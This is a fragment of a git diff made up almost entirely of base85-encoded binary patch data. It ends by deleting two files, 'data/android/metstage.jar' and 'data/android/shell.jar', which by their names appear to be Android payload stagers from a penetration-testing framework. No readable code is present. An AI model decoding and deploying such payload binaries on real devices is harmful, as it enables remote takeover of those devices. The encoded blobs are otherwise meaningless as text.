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

diff --git a/data/android/metstage.jar b/data/android/metstage.jar
deleted file mode 100644
index 447bf2a5760687cb0a8aacdc5e70785ae3ba8b60..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1787
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
J|GxhB>o0PYD3<^L

diff --git a/data/android/shell.jar b/data/android/shell.jar
deleted file mode 100644
index df61c7beeb9ebfa16ec774363462c1e40461de9a..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1818
zcmZ{ldpr~R8^@=aOInvRrY(x*+H6BOhA`T)mRVYe;*?7WlSwT~(aohpE_2ECm`jBT
z<s8iAIAW&U7H67E%H0Wzw7GQn{r))pey`X0Jg?{VeV*6z`hGv(zn(XR1e8_;$jQk8
zY<{vK0KStVKpJ3=r{YjVG67?cBNGYuQ&hA)VWR^8_-x<FJ3&IBd%z^rp*NjfRgU`n
z!=vLN#Io*Xt^-+5N<ni{1FBpMoh@WJErei|3$>W6qA9b}uDUELAa&nj$YO{TfI^a$
z`=%E<xMgd%nUsJ1i^AsAGvGX(?oCH~d0z`;y7{V{-rLrAxQ63Zl@Wxt@8bvc`eXV7
z>@XTZd?Q!&3gdhtLL=(L)ne|;cLMGlD~5l62{-MDe`Glor<QWikwRH0bnPAk<3Kkm
zC8M@wcBK7>EcxGln+r?wNgIh65x>EXL`<5eVKuK}1&!a-*4I9LK^26zEcCY0pf86?
zvkugnit&B2?1Z^X2SqWy42ktUKFyN2q)1%#p<FmxFM_kA7(~Q%Y0)V=RgvL-bI+rf
zsT=3_3~h^yHvdUU2vjXO062z|&jQk-kfZcqNNLnjm4;^hbbw~?&U&yV(Bn3{d1X|4
z0r?fYCLi?QJFn$`Ay=r*NnwNKEP$_?c}=qHD5VAXHDJ9gI(k?0u~Eo^=GUETayMlo
zZ`X}l-KtKM*FW+5ZaKDAy1btTE6p(v#=<F7G;1Yc13`g#s-d^YiJ&8SX{>pP!>JHK
z6643yXPoCJtZX@S{0ky}kd-?8WSAE@biDD_7q`?6=5o`<&ZWTPjR9Q7q@=C82DuJj
zLLG11)8l+lva7o;Wh1V&ZJ3Y{tCGHSClR`=%b>)YYmIrfPpI#Sj1PNiFu%Lf-N#7n
z6^3{A(+?pKaGcl|dNZlR15)|xF)qhuX6e_CGwvUGd2M%${BqN4pgrs}o$y?%={ADN
z>fLHzyUybH!w8>jo|Y!0+O0h$$zYJp3ZV6=ahIF)962$cKBVCpY(sqzM#2=PMJEEE
zS{BT>9bDI@Sp6_PlA2QKY^N29(jADWX}4~V$^V0ApvX9@a6zcsU#O~vc^7ph;}>_P
zde;QQ-fyGb$1I|=s_wo0;3;r;*J250TD|V#XQgQYe0WL#HO!GAc%GwYJYSC?&oE3-
z9X_5`tfQR~#;*+tRhfjUS~3O}vBPY_$>W1(ext&p;?~;kMVaYBhw@|LvSGPt#wU}#
zGU|XwhKzjI!mSDzh|7kCIc0H~>R-BUbWMl_H=e;3;T1bGiyjD@GTmszxb;C@QN5D!
z4sWr$<p9U!<V}-kPJ;p*!w55XWu@m1-N~AFTy(3qBDq9-texpv8Rg3rJZXWe9%xlL
zANrDcFX2gx8Q35h8qjbt{7ifi;YvrfWL<uyhZC^RV!q+^4UIb<bqzu|WBlT7tG0o6
z0<-XSy|LAOK;`hqBqtA^MwbymB<uk(7uYe3=X{t?Ocl>}Di9q0*q>+oNxNuG(BV<n
z*&QrE-gkiPLj;yums-2#TMvQSkf66A+^g<SsM(I?P&0Z^P{?o@Rm4B7gH5d(@58oz
zewq(qK64N9w=6-w6;&4ocVK5fcDxnR$y4!+jSHqQnR2?8!(R`dK3_!e@B@>o1L*~2
z=J1Kd)?ix<1SfE#m75NqMUO?e{jp|qCFHqjBp*EatPp{tfJG@W)P!8qacGOh3qk+{
z_hPEw|I))YD5oOg)oTQ47YxDvSwcwhrUjLOVf5_Y!FD_}8=_Q`(|$!f*=6z9pB1r_
z@5TNVAEh;wZAr1*nGdKK`(%@IYM!<FCIm?+uH;(g8Wyqru+Y*r;9j-hq<{91+E;14
